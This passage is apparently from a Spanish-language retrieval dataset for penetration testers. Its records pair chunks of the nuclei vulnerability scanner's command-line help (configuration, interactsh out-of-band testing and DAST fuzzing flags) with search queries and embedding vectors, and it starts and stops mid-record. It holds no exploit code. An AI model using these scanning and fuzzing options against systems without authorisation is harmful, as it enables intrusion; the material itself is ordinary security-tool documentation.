0.00658, 0.02587, 0.06324, -0.03878, 0.02235, -0.06277, -0.09355, -0.00465, 0.04191, -0.08041, -0.00601, -0.00794, -0.04179, -0.01948, -0.04671, -0.0328, -0.00302, -0.02962, 0.0202, 0.05569, 0.00457, -0.01419, -0.04535, 0.03969, 0.07398, -0.01514, -0.03849, -0.04125, 0.01149, -0.04746, -0.03653, -0.02936, -0.04482, -0.03567, 0.03205, 0.05856, -0.00537, -0.03392, -0.03878, 0.06298, 0.03522, -0.01196, 0.11663, -0.0562, -0.00306, -0.04143, 0.06604, 0.01071, -0.0078, -0.00295, 0.00609, -0.00699, 0.02952, 0.03719, 0.00565, 0.0511, 0.00729, -0.03489, 0.02417, -0.01508, 0.03194, -0.01247, -0.04606, -0.03378, 0.02157, -0.06659, 0.04986, -0.03218, -0.08639, -0.08092, -0.02303, 0.06615, -0.00282, -0.06502, 0.01411, -0.11838, -0.00541, -0.03251, -0.03405, -0.06167, -0.04293, 0.01456, 0.06444, -0.04134, -0.01642, -0.03946]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "CONFIGURATIONS:\n -config string path to the nuclei configuration file\n -tp, -profile string template profile config file to run\n -tpl, -profile-list list community template profiles\n -fr, -follow-redirects enable following redirects for http templates\n -fhr, -follow-host-redirects follow redirects on the same host\n -mr, -max-redirects int max number of redirects to follow for http templates (default 10)\n -dr, -disable-redirects disable redirects for http templates\n -rc, -report-config string nuclei reporting module configuration file\n -H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)\n -V, -var value custom vars in key=value format\n -r, -resolvers string file containing resolver list for nuclei\n -sr, -system-resolvers use system DNS resolving as error fallback\n -dc, -disable-clustering disable clustering of requests\n -passive enable passive HTTP response processing mode\n -fh2, -force-http2 force http2 connection on requests\n -ev, -env-vars enable environment variables to be used in template\n -cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts\n -ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts\n -ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts\n -sml, -show-match-line show match lines for file templates, works with extractors only\n -ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default\n -sni string tls sni hostname to use (default: input domain name)\n -dka, -dialer-keep-alive value keep-alive duration for network requests.\n -lfa, -allow-local-file-access allows file (payload) access anywhere on the system\n -lna, -restrict-local-network-access blocks connections to the local / private network\n -i, -interface string network interface to use for network scan\n -at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)\n -sip, -source-ip string source ip address to use for network scan\n -rsr, -response-size-read int max response size to read in bytes\n -rss, -response-size-save int max response size to read in bytes (default 1048576)\n -reset reset removes all nuclei configuration and data files (including nuclei-templates)\n -tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization\n -hae, -http-api-endpoint string experimental http api endpoint", "indexar": "cual programa puedo usar para analizar el comportamiento HTTP de mi sitio", "v": [-0.09226, 0.1245, -0.13251, -0.12921, -0.00154, -0.12895, -0.0157, -0.04848, -0.10223, 0.02665, -0.13142, -0.03529, -0.0479, 0.01335, 0.05633, -0.03776, 0.14095, -0.09496, 0.09076, -0.0512, 0.02041, -0.08063, -0.05535, -0.0459, -0.06445, 0.00465, 0.07122, 0.01392, -0.05325, -0.13246, 0.03254, -0.00037, -0.01402, 0.02684, -0.06178, 0.00498, -0.04535, 0.02971, 0.01742, 0.09036, -0.02162, -0.01136, -0.05852, -0.00201, -0.01056, 0.0406, -0.09933, -0.1461, -0.05837, -0.09468, 0.06354, 0.04874, -0.15522, 0.04152, 0.033, 0.07015, 0.05947, -0.17835, 0.0494, -0.09074, -0.02857, -0.0208, 0.05283, -0.00618, -0.00647, -0.08996, 0.07452, 0.06769, -0.15243, 0.04369, 0.00501, 0.08011, -0.00656, -0.05451, 0.12943, 0.10754, -0.01611, -0.00607, 0.03975, 0.00604, 0.00581, 0.02895, -0.0461, 0.14711, -0.15358, -0.05591, 0.01145, -0.10818, 0.08579, -0.01468, 0.05015, 0.0728, -0.05124, -0.0196, -0.07417, -0.13792, 0.08765, 0.01701, 0.05836, 0.03101, 0.06165, -0.03231, -0.08779, 0.08452, 0.05942, 0.14752, 0.04742, -0.0336, -0.02278, -0.07285, 0.02785, -0.03606, -0.14666, -0.05576, -0.02531, 0.01206, -0.04298, -0.0345, 0.03039, -0.14989, -0.1007, 0.00883, -0.08603, -0.04722, 0.03137, 0.00745, 0.03679, 0.05321, -0.04236, 0.05573, 0.00721, -0.02388, -0.05545, -0.00403, -0.06286, -0.00639, 0.03853, -0.03765, -0.01974, -0.00045, 0.01718, 0.01098, -0.05481, 0.03607, 0.1104, -0.02727, -0.00676, -0.04062, -0.09102, 0.02643, 0.02463, 0.06927, -0.03883, 0.03268, -0.0501, -0.04861, 0.00402, -0.09253, -0.05695, 0.02972, 0.03688, 0.00112, 0.07817, 0.0254, 0.10165, 0.05757, -0.03681, 0.04394, 0.07728, 0.04374, 0.01717, 0.08473, -0.01302, -0.14646, 0.00171, -0.05856, -0.06715, -0.05234, 0.01949, -0.04861, -0.01492, 0.01639, 0.02571, -0.0028, -0.07556, 0.0123, 0.04418, -0.00416, -0.02136, 0.00281, -0.01393, 0.04351, -0.03983, 0.02718, 0.0872, -0.00823, -0.01045, -0.00915, 0.04864, -0.06144, -0.06582, -0.03002, 0.02283, -0.04556, 0.02247, 0.06763, 0.00641, -0.02779, -0.01506, 0.03927, -0.00592, -0.08813, 0.098, -0.04234, -0.07565, -0.02921, 0.04671, 0.02808, 0.0055, 0.06361, 0.00654, 0.01562, 0.04298, 0.0288, 0.00362, -0.00308, 0.0602, -0.05129, 0.00763, 0.0211, -0.06053, -0.01005, -0.0721, -0.04748, 0.05888, -0.00162, -0.01126, -0.02994, -0.07026, -0.10548, 0.04049, 0.09841, -0.06119, -0.07321, -0.00349, -0.04559, -0.12204, -0.00123, -0.01187, -0.02588, -0.04569, -0.01909, 0.04548, -0.08737, 0.03219, 0.00958]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "CONFIGURATIONS:\n -config string path to the nuclei configuration file\n -tp, -profile string template profile config file to run\n -tpl, -profile-list list community template profiles\n -fr, -follow-redirects enable following redirects for http templates\n -fhr, -follow-host-redirects follow redirects on the same host\n -mr, -max-redirects int max number of redirects to follow for http templates (default 10)\n -dr, -disable-redirects disable redirects for http templates\n -rc, -report-config string nuclei reporting module configuration file\n -H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)\n -V, -var value custom vars in key=value format\n -r, -resolvers string file containing resolver list for nuclei\n -sr, -system-resolvers use system DNS resolving as error fallback\n -dc, -disable-clustering disable clustering of requests\n -passive enable passive HTTP response processing mode\n -fh2, -force-http2 force http2 connection on requests\n -ev, -env-vars enable environment variables to be used in template\n -cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts\n -ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts\n -ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts\n -sml, -show-match-line show match lines for file templates, works with extractors only\n -ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default\n -sni string tls sni hostname to use (default: input domain name)\n -dka, -dialer-keep-alive value keep-alive duration for network requests.\n -lfa, -allow-local-file-access allows file (payload) access anywhere on the system\n -lna, -restrict-local-network-access blocks connections to the local / private network\n -i, -interface string network interface to use for network scan\n -at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)\n -sip, -source-ip string source ip address to use for network scan\n -rsr, -response-size-read int max response size to read in bytes\n -rss, -response-size-save int max response size to read in bytes (default 1048576)\n -reset reset removes all nuclei configuration and data files (including nuclei-templates)\n -tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization\n -hae, -http-api-endpoint string experimental http api endpoint", "indexar": "con que puedo hacer pruebas automatizadas de seguridad en aplicaciones web", "v": [-0.08357, 0.14191, -0.14489, -0.29651, -0.01541, -0.00632, -0.09129, -0.01475, -0.08705, -0.00895, -0.09638, -0.11522, -0.0203, 0.01937, 0.02508, 0.0199, 0.03117, -0.0795, 0.01484, 0.02862, 0.07593, -0.06428, -0.15569, -0.09692, -0.02547, 0.1266, 0.02097, 0.05093, -0.13761, -0.05141, -0.08124, 0.04457, 0.10347, 0.04354, -0.11977, 0.00175, 0.00335, 0.01097, 0.03919, 0.0409, 0.00491, -0.01509, -0.05445, -0.02765, 0.14228, 0.09354, 0.05764, -0.07164, -0.01081, -0.116, -0.05652, -0.14727, -0.02683, -0.0816, -0.02224, -0.08768, 0.11967, -0.0865, 0.09763, -0.02687, -0.08222, 0.00402, 0.03924, 0.13184, 0.02257, 0.01588, 0.11528, 0.10941, -0.07026, 0.05303, 0.08535, 0.06336, 0.00488, 0.05956, 0.01799, -0.04666, -0.06071, 0.0041, -0.02396, 0.05409, -0.04831, 0.04582, -0.04522, 0.04155, -0.05408, -0.08569, -0.06551, -0.01724, 0.03597, -0.00293, 0.09387, 0.04476, 0.03393, 0.03633, 0.05138, -0.06545, 0.11007, -0.05978, 0.02954, 0.00626, 0.03156, -0.07002, -0.02367, 0.00683, -0.0592, -0.02438, 0.03745, 0.0252, 0.04912, -0.11241, -0.04389, -0.03424, -0.05375, -0.00954, -0.09119, 0.05508, 0.03954, -0.11141, 0.02793, -0.05673, -0.06066, -0.03325, -0.03704, -0.04906, 0.05844, 0.01256, 0.06175, 0.13598, -0.04319, 0.00883, 0.10309, -0.0281, -0.16678, -0.02541, -0.038, 0.06499, -0.03392, -0.10191, 0.00642, -0.03236, 0.03534, 0.05188, 0.0302, 0.00253, 0.05418, 0.06063, -0.05098, 0.013, -0.03955, 0.01931, -0.0142, -0.05747, -0.04829, 0.0365, -0.08923, 0.05065, -0.01553, -0.07066, 0.04963, 0.01864, -0.01363, 0.0357, -0.05676, 0.01643, 0.00191, 0.0381, 0.02787, -0.02747, 0.02284, 0.02268, -0.01056, 0.10389, 0.05834, -0.08332, 0.06994, 0.03371, 0.00433, -0.05369, -0.03067, -0.09968, -0.03989, -0.05877, -0.01995, -0.00343, 0.11239, -0.07536, 0.05474, -0.01382, 0.05893, 0.07064, -0.04904, 0.08154, -0.06789, 0.05281, 0.04605, 0.03245, 0.05254, -0.02282, -0.0761, -0.03429, -0.07518, -0.0554, -0.03098, -0.04054, -0.00329, 0.08457, 0.04224, 0.04053, 0.00477, 0.0006, 0.01053, 0.03548, 0.09062, -0.04255, -0.05055, -0.06389, 0.05463, 0.02836, -0.10041, 0.01496, -0.00832, -0.03421, -0.01941, 0.02411, -0.0257, 0.02493, 0.00971, 0.00808, 0.01546, -0.02798, 0.00992, -0.00144, -0.04013, -0.00296, 0.03848, -0.01232, -0.02314, -0.0129, -0.04078, -0.08806, -0.06593, 0.07827, 0.0264, -0.04281, -0.07631, -0.04731, -0.06342, -0.01907, -0.00078, -0.04869, -0.04055, 0.02168, 0.02801, -0.02102, 0.00099, 0.01085]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "INTERACTSH:\n -iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)\n -itoken, -interactsh-token string authentication token for self-hosted interactsh server\n -interactions-cache-size int number of requests to keep in the interactions cache (default 5000)\n -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)\n -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)\n -interactions-cooldown-period int extra time for interaction polling before exiting (default 5)\n -ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates", "indexar": "que herramienta sirve para realizar pruebas de penetraciΓ³n sin necesidad de registro?", "v": [0.0455, 0.06313, -0.26419, -0.29825, 0.16739, -0.11873, -0.0903, -0.03193, 0.04317, -0.04364, -0.02326, 0.03854, 0.01898, -0.13915, 0.05191, 0.10462, -0.00202, -0.10379, -0.06408, 0.01274, -0.03484, -0.0523, -0.04188, 0.00372, -0.07132, 0.12113, -0.00215, -0.01325, -0.11135, 0.02775, -0.04754, 0.0187, 0.04719, -0.04788, -0.0505, -0.07425, -0.04855, 0.01702, 0.01536, 0.15123, 0.00154, 0.04148, -0.02348, 0.07767, 0.02169, -0.0015, 0.0657, 0.0386, -0.0742, 0.08264, 0.02407, -0.05788, -0.10745, -0.05162, -0.06297, -0.11367, 0.1127, -0.13146, 0.02455, -0.13296, -0.10505, -0.03848, -0.01318, -0.02798, 0.00613, -0.08625, 0.06289, 0.02787, -0.0308, 0.03387, -0.00559, 0.04442, 0.01856, -0.13745, -0.11854, -0.0687, 0.07411, 0.00966, -0.02573, 0.00505, 0.06567, 0.016, -0.05252, -0.03577, -0.09682, -0.04659, 0.06608, -0.0517, 0.10736, -0.10123, 0.05604, 0.10544, -0.00288, 0.0143, 0.12621, -0.00688, 0.06757, -0.06396, 0.06316, -0.00479, 0.16196, -0.00036, -0.07619, 0.06326, -0.01702, 0.00842, 0.00188, -0.03262, -0.0373, -0.06001, 0.0809, 0.02414, -0.07941, -0.0646, -0.04647, 0.10667, -0.01168, -0.07412, -0.0464, -0.05568, -0.01017, 0.00048, -0.08637, -0.1033, -0.07422, -0.06981, -0.01089, 0.01684, 0.00797, -0.00693, 0.08802, -0.0101, -0.11194, 0.05785, 0.01382, -0.03828, -0.02405, -0.06564, 0.00108, -0.0355, 0.02351, 0.04113, -0.08136, -0.13094, 0.01306, 0.06075, -0.01896, -0.03296, -0.08385, -0.01687, -0.04987, -0.07998, -0.07654, 0.11772, -0.03773, -0.00922, -0.00179, -0.01973, -0.03945, 0.03971, -0.07021, -0.07778, 0.00062, 0.0031, 0.04681, -0.02241, -0.00606, -0.05628, 0.05623, 0.03173, 0.04031, 0.02086, 0.0365, -0.03232, 0.01602, 0.002, -0.01029, -0.02158, -0.02275, -0.06147, -0.04617, 0.00493, -0.04111, -0.05223, 0.07028, -0.02003, -0.0057, -0.04134, 0.06573, 0.03759, 0.04752, 0.01176, -0.02149, -0.02273, 0.05821, 0.00922, -0.01977, -0.00867, 0.02614, -0.08242, -0.0415, -0.0888, -0.01027, -0.04486, 0.01306, 0.08076, -0.04291, -0.0307, 0.03808, -0.00646, 0.00319, -0.00636, 0.00775, -0.04619, -0.03103, -0.04011, 0.01598, 0.04235, -0.06359, 0.0326, 0.03086, -0.00202, 0.02455, 0.00719, -0.04007, 0.0613, 0.00429, -0.01022, 0.02822, 0.0026, 0.02252, 0.00875, -0.02526, 0.00044, 0.06323, -0.04908, -0.01167, -0.02699, -0.04737, -0.07357, -0.02379, 0.0677, -0.01972, 0.00297, -0.03872, -0.0379, -0.01282, -0.04006, 0.00849, -0.085, -0.04505, -0.00599, 0.04757, -0.05009, 0.08198, -0.03915]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "INTERACTSH:\n -iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)\n -itoken, -interactsh-token string authentication token for self-hosted interactsh server\n -interactions-cache-size int number of requests to keep in the interactions cache (default 5000)\n -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)\n -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)\n -interactions-cooldown-period int extra time for interaction polling before exiting (default 5)\n -ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates", "indexar": "cual es un programa para simular interacciones web sin usar tokens ni autenticaciΓ³n?", "v": [-0.04093, 0.02575, -0.16291, -0.00085, 0.20506, -0.16191, -0.07563, -0.10567, -0.03834, -0.01507, -0.19823, -0.08216, 0.03889, 0.03075, -0.02588, 0.01136, 0.09406, -0.12346, 0.19277, 0.04329, 0.03171, -0.08074, -0.03259, -0.14352, -0.03241, 0.00397, -0.00124, -0.02308, 0.01493, -0.0613, 0.00692, -0.06222, 0.19171, -0.08538, -0.04654, -0.07946, 0.02386, 0.0518, 0.07066, 0.05896, 0.07645, 0.08097, -0.06843, -0.04067, 0.033, 0.06642, 0.03176, -0.0373, -0.02854, -0.07739, -0.06454, 0.01615, -0.08951, -0.01729, 0.01739, -0.14192, 0.11368, -0.13711, 0.0553, -0.02657, -0.05363, -0.01805, 0.00305, -0.04296, 0.05599, -0.01307, 0.03122, -0.00039, -0.07502, 0.08899, 0.04159, 0.02863, 0.07637, 0.0312, 0.05505, -0.02799, -0.08252, -0.07298, 0.06748, -0.01447, 0.01579, -0.08699, 0.04108, 0.07265, -0.0237, -0.02809, 0.09256, -0.02491, 0.07012, -0.04517, -0.0057, 0.04283, 0.05116, 0.04704, 0.1098, -0.10939, 0.12138, 0.03162, 0.01974, -0.0141, 0.05712, -0.05058, -0.14995, 0.10681, 0.04243, 0.104, 0.06294, 0.00658, -0.07601, 0.00941, -0.01866, -0.03994, -0.14975, 0.00356, 0.00856, 0.07361, -0.02664, -0.04068, 0.07811, -0.14017, -0.04222, 0.00274, -0.04572, 0.01955, 0.05323, 0.08355, -0.00491, 0.04339, -0.07248, 0.06815, -0.01523, -0.01876, -0.08669, -0.06294, -0.01541, -0.08312, 0.03621, -0.02939, 0.04508, -0.01857, 0.08425, 0.05314, -0.00198, -0.03085, 0.04671, 0.05833, -0.02751, -0.03952, -0.07507, 0.08139, -0.02072, 0.01679, -0.01044, 0.07433, -0.08564, -0.04058, 0.02229, -0.04028, -0.08962, 0.03007, -0.06984, -0.02545, 0.06911, -0.03795, 0.01883, -0.04356, -0.04482, 0.01142, -0.00208, 0.04203, 0.03958, 0.09946, 0.044, -0.04002, 0.059, 0.03189, -0.09218, -0.06514, -0.01066, -0.11113, -0.01595, -0.02447, 0.09832, 0.04087, 0.02021, -0.00136, -0.05271, 0.04658, -0.01017, 0.07625, 0.01064, 0.01858, -0.01983, 0.0399, 0.05991, 0.06703, 0.03847, -0.06273, 0.08045, -0.0389, -0.00043, -0.02967, -0.01424, -0.05239, 0.05868, 0.13032, -0.02466, -0.0355, 0.0102, 0.072, 0.0332, -0.04419, 0.02483, -0.02107, 0.01612, -0.08409, 0.04331, 0.03267, -0.01919, -0.02552, 0.00581, 0.03114, -0.00927, 0.06272, -0.00857, -0.01376, 0.03328, 0.03372, -0.00511, 0.00509, -0.02844, -0.04423, 0.0055, 0.01479, -0.00377, 0.02606, 0.05227, 0.00761, -0.06186, -0.09419, -0.00724, 0.08851, 0.00093, -0.03715, -0.01174, 0.02834, -0.0878, -0.01578, -0.00477, 0.00564, -0.02593, -0.02389, 0.04799, -0.01752, 0.03465, 0.02052]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "INTERACTSH:\n -iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)\n -itoken, -interactsh-token string authentication token for self-hosted interactsh server\n -interactions-cache-size int number of requests to keep in the interactions cache (default 5000)\n -interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)\n -interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)\n -interactions-cooldown-period int extra time for interaction polling before exiting (default 5)\n -ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates", "indexar": "con que puedo hacer anΓ‘lisis de vulnerabilidades usando interactsh?", "v": [0.11344, 0.24372, -0.15265, -0.11266, 0.02723, -0.00197, -0.06462, 0.00022, -0.06398, -0.00656, 0.05256, -0.10194, -0.12239, 0.09194, -0.02278, 0.02512, 0.02833, -0.04513, -0.04022, -0.03086, 0.0148, -0.09743, -0.12801, -0.05417, -0.04196, 0.06889, -0.09167, 0.01033, 0.02824, -0.06346, -0.12099, -0.04636, 0.08588, 0.0202, -0.08885, 0.04718, -0.10489, 0.04428, 0.1441, 0.10607, -0.00588, 0.01551, -0.11013, -0.00607, 0.14492, -0.00733, -0.15972, -0.12617, -0.05068, 0.04469, -0.08374, -0.02519, -0.21886, -0.01458, 0.02563, -0.09082, 0.12114, -0.12612, 0.09163, 0.00186, -0.06858, 0.11622, 0.08276, 0.02459, 0.05371, -0.096, -0.002, 0.03934, -0.08109, 0.13821, 0.06127, 0.07563, -0.08357, -0.00641, 0.02019, 0.10179, -0.00696, 0.03142, -0.01621, -0.01288, -0.03744, 0.02596, 0.06138, 0.10479, -0.14363, -0.06102, 0.04078, -0.05483, 0.05987, -0.02094, 0.0875, 0.00327, -0.05166, -0.08809, 0.01547, -0.05393, 0.00285, 0.0306, -0.00446, 0.00126, 0.05, -0.00052, -0.05811, 0.05303, 0.03403, 0.05718, 0.02302, -0.0278, 0.04367, -0.07985, -0.00259, -0.03669, -0.06972, -0.14217, 0.0094, 0.04028, -0.0918, -0.02975, 0.03126, -0.02651, -0.02764, -0.01149, -0.09088, -0.03282, -0.04016, 0.00533, 0.05017, 0.07548, -0.02481, 0.01287, -0.02144, -0.02298, -0.04125, -0.04095, 0.05497, 0.02786, 0.07729, -0.01735, -0.09905, -0.02161, 0.08773, 0.08124, 0.08696, 0.04637, 0.03689, 0.0851, -0.01102, -0.06545, -0.12061, 0.06123, 0.06621, 0.01817, -0.0862, 0.05585, 0.00764, -0.04885, -0.04748, -0.04387, -0.02142, 0.04757, 0.00709, 0.0604, -0.03013, 0.08325, 0.02917, -0.00746, 0.02553, -0.03552, 0.09926, 0.06374, -0.02702, 0.02672, 0.07831, -0.0066, 0.0337, -0.00287, 0.01621, -0.00848, -0.02304, -0.06624, -0.0189, -0.05191, -0.00599, -0.0089, -0.00689, 0.01306, 0.01604, -0.00437, 0.09287, 0.04517, -0.03819, 0.04947, 0.0137, 0.0536, 0.08751, -0.05458, 0.03557, 0.00616, -0.01883, -0.04692, -0.0067, 0.0198, -0.01719, -0.03297, 0.04044, 0.09597, -0.06669, 0.0228, 0.01919, 0.02927, 0.03489, 0.02087, 0.12057, -0.05025, -0.05304, 0.00102, 0.00747, 0.02401, -0.01044, -0.01076, -0.00436, 0.01689, 0.05395, 0.01353, 0.01726, 0.02329, -0.02133, -0.0649, 0.03163, 0.01926, 0.00202, 0.0212, -0.04251, -0.06043, 0.04913, -0.02897, -0.01176, -0.02287, -0.02602, -0.04185, 0.03776, 0.02634, -0.03038, -0.0491, 0.00377, -0.04869, -0.05175, 0.05138, -0.01188, -0.06804, -0.03105, 0.03617, 0.05392, -0.05954, 0.04331, -0.06582]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FUZZING:\n -ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)\n -fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)\n -fuzz enable loading fuzzing templates (Deprecated: use -dast instead)\n -dast enable / run dast (fuzz) nuclei templates\n -dts, -dast-server enable dast server mode (live fuzzing)\n -dtr, -dast-report write dast scan report to file\n -dtst, -dast-server-token string dast server token (optional)\n -dtsa, -dast-server-address string dast server address (default \"localhost:9055\")\n -dfp, -display-fuzz-points display fuzz points in the output for debugging\n -fuzz-param-frequency int frequency of uninteresting parameters for fuzzing before skipping (default 10)\n -fa, -fuzz-aggression string fuzzing aggression level controls payload count for fuzz (low, medium, high) (default \"low\")\n -cs, -fuzz-scope string[] in scope url regex to be followed by fuzzer\n -cos, -fuzz-out-scope string[] out of scope url regex to be excluded by fuzzer", "indexar": "que programa puedo usar para realizar pruebas de penetraciΓ³n en aplicaciones web?", "v": [0.01475, 0.11764, -0.19499, -0.27031, 0.07805, -0.01017, -0.01126, -0.03486, -0.0414, -0.01941, -0.0859, -0.01059, -0.08245, -0.07543, -0.07884, 0.02243, 0.03214, -0.1255, 0.0183, 0.01987, -0.01762, 0.00527, -0.17077, -0.03905, -0.05503, 0.20975, -0.01807, -0.01833, 0.0029, -0.09532, -0.06322, -0.00737, 0.10387, -0.04983, -0.09415, -0.05193, -0.01283, -0.02555, 0.07997, 0.09514, 0.05203, -0.02324, -0.06147, 0.01193, 0.08512, 0.03347, 0.09044, -0.0588, -0.11975, -0.08192, 0.00542, -0.00263, -0.04775, 0.01804, -0.00972, -0.13697, 0.06732, -0.15014, -0.01431, -0.02146, -0.02237, -2e-05, 0.0245, 0.04038, 0.06917, -0.06414, 0.0923, 0.1334, -0.09557, 0.08212, 0.04209, 0.09844, 0.0227, -0.02771, -0.02895, 0.02187, -0.03506, -0.03618, 0.02412, -0.04309, -0.03373, 0.02415, -0.01501, 0.04077, -0.13327, -0.05212, 0.05932, -0.04528, 0.06692, -0.08925, 0.04334, 0.06002, -0.02356, 0.04873, 0.06505, -0.11903, 0.09952, 0.00403, 0.10522, 0.03256, 0.08519, -0.04318, -0.06812, 0.05193, -0.08853, 0.02937, 0.05883, -0.04611, -0.05876, -0.05593, 0.01498, -0.07753, -0.10778, -0.08278, -0.1166, 0.06736, 0.00778, -0.10867, -0.01818, -0.13534, -0.1153, 0.00197, -0.05736, -0.00744, 0.04247, -0.0274, 0.04277, 0.07984, -0.10281, 0.07309, 0.08586, 0.00181, -0.09861, 0.02373, -0.04814, -0.04274, 0.00394, -0.03969, 0.02831, 0.00252, 0.02723, 0.05003, -0.04391, 0.01716, 0.05001, 0.05747, -0.06258, -0.02231, -0.03638, 0.00502, 0.0014, -0.06104, -0.09753, 0.0848, -0.07146, -0.05348, 0.03969, -0.06064, -0.02731, 0.03217, -0.09259, -0.00988, -0.07397, -0.03368, 0.04776, -0.02121, -0.01161, -0.03558, 0.05412, 0.07807, 0.00749, 0.14402, 0.02558, -0.09352, 0.05523, 0.01483, 0.00266, -0.05501, -0.01522, -0.08035, -0.06702, -0.00065, 0.02038, -0.01543, 0.04886, -0.01344, -0.01614, 0.02399, 0.00912, 0.04694, -0.01242, 0.05365, 0.00215, 0.05095, 0.06002, 0.01052, -0.00452, 0.00434, -0.03531, -0.07482, -0.06485, -0.04758, -0.01336, -0.0472, 0.02983, 0.06936, -0.01953, -0.00727, 0.02433, 0.06296, -0.01508, -0.02055, 0.05289, 0.00021, -0.04107, -0.07578, 0.04322, 0.07965, -0.04365, 0.03472, -0.00868, 0.00248, -0.00336, 0.04691, -0.01351, 0.00858, -3e-05, -0.01889, 0.00727, 0.01045, 0.0195, -0.05186, -0.02281, -0.07043, 0.03783, -0.02186, -0.03661, -0.00219, -0.03476, -0.07059, -0.07437, 0.08995, 0.02557, 0.01478, -0.04188, -0.01084, -0.06589, -0.01917, -0.00905, -0.0253, -0.03167, 0.03958, 0.04121, -0.06578, 0.04768, 0.04391]} +{"tipo": "pregunta", "herramienta": "nuclei", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/nuclei.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "FUZZING:\n -ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)\n -fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)\n -fuzz enable loading fuzzing templates (Deprecated: use -dast instead)\n -dast enable / run dast (fuzz) nuclei templates\n -dts, -dast-server enable dast server mode (live fuzzing)\n -dtr, -dast-report write dast scan report to file\n -dtst, -dast-server-token string dast server token (optional)\n -dtsa, -dast-server-address string dast server address (default \"localhost:9055\")\n -dfp, -display-fuzz-points display fuzz points in the output for debugging\n -fuzz-param-frequency int frequency of uninteresting parameters for fuzzing before skipping (default 10)\n -fa, -fuzz-aggression string fuzzing aggression level controls payload count for fuzz (low, medium, high) (default \"low\")\n -cs, -fuzz-scope string[] in scope url regex to be followed by fuzzer\n -cos, -fuzz-out-scope string[] out of scope url regex to be excluded by fuzzer", "indexar": "existe alguna alternativa libre a nuclei para escanear vulnerabilidades?", "v": [0.0533, -0.02301, -0.16855, 0.04438, -0.05543, -0.02182, -0.09483, -0.11895, -0.12847, -0.03464, 0.01064, -0.20494, -0.07284, 0.06172, 0.02851, -0.00367, -0.03999, -0.13149, 0.14711, 0.08154, -0.12593, -0.04987, -0.10854, -0.02182, -0.11066, -0.02833, -0.12471, 0.04846, 0.04998, -0.0183, -0.06075, -0.01415, 0.08494, -0.03538, -0.04395, 0.10263, 0.09806, -0.0481, 0.15743, -0.03896, 0.06004, -0.00367, -0.03542, 0.01106, 0.00511, -0.0324, -0.16477, -0.00906, 0.06608, 0.02785, -0.04536, 0.01337, -0.1643, 0.02766, 0.05449, -0.02308, 0.16664, -0.05029, 0.04092, -0.00204, -0.16019, 0.12788, 0.09949, -0.13315, 0.0335, 0.05835, -0.04793, -0.0093, -0.15995, 0.13174, -0.0076, -0.02479, 0.00729, -0.05183, -0.14316, -0.0229, -0.04193, -0.00674, -0.06448, 0.14568, 0.03687, -0.0111, 0.04281, 0.03196, -0.15569, -0.05412, 0.13952, -0.09317, -0.00549, 0.03472, 0.09031, 0.03974, -0.01432, 0.16267, 0.0078, -0.04928, 0.01873, 0.0852, -0.02616, 0.05681, 0.02809, 0.00281, -0.08204, 0.07901, 0.0608, 0.05676, -0.01808, 0.00168, 0.02764, 0.00738, -0.04595, 0.00555, -0.04418, -0.04601, -0.07453, 0.0423, -0.01548, 0.03852, 0.04872, -0.03563, -0.00155, -0.0488, -0.03707, -0.01576, -0.05164, -0.011, -0.00778, 0.0422, -0.0108, 0.02351, -0.00579, -0.04679, -0.03958, -0.04705, -0.10169, -0.0005, 0.04132, -0.11703, 0.00803, -0.03061, 0.06474, 0.00082, -0.03618, 0.01488, 